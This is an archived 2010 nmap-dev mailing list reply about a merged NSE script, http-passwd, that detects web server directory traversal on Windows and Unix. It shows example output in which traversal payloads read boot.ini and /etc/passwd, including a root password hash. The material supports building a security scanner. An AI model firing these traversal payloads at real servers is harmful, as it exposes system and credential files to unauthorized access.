Nmap Development mailing list archives
Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)
From: Gutek <ange.gutek () gmail com>
Date: Sat, 19 Jun 2010 17:44:55 +0200
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Here is a merged version. I just added checkings for boot.ini in the original generic directory escalation strings table. Those are "dot and slashes hexified". Then I added another table for more specific payloads. The script has to deal with them in a different way than the generic ones: they can not always be fully hexified, sometimes they need special prepend/append... in a word, those strings have to be passed "as published" through the GET request. Concerning boot.ini: it exists on Windows <=XP, not on neither Vista nor Seven. Example Outputs : - -- @output - -- 80/tcp open http - -- | http-passwd: Directory Traversal Found. - -- | Payload: "index.html?../../../../../boot.ini" - -- | Printing first 250 bytes: - -- | [boot loader] - -- | timeout=30 - -- | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS - -- | [operating systems] - -- |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect - -- - -- - -- 80/tcp open http - -- | http-passwd: Directory Traversal Found. - -- | Payload: "../../../../../../../../../../etc/passwd" - -- | Printing first 250 bytes: - -- | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh - -- | sshd:*:65532:65534::/:/bin/false - -- | ftp:*:65533:65534::/:/bin/false - -- |_nobody:*:65534:65534::/:/bin/fals A.G. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.12 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/ iEYEARECAAYFAkwc5fcACgkQ3aDTTO0ha7gQRQCfb9C72W3LHiunochL+S4G0rm3 fxkAoIROyqhoB1xoM84KX79IHrwYePUY =2Jlp -----END PGP SIGNATURE-----
Attachment:
http-passwd.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Ron (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) David Fifield (Jun 18)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (Jun 19)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (Jun 19)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) David Fifield (Jun 22)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Ron (May 24)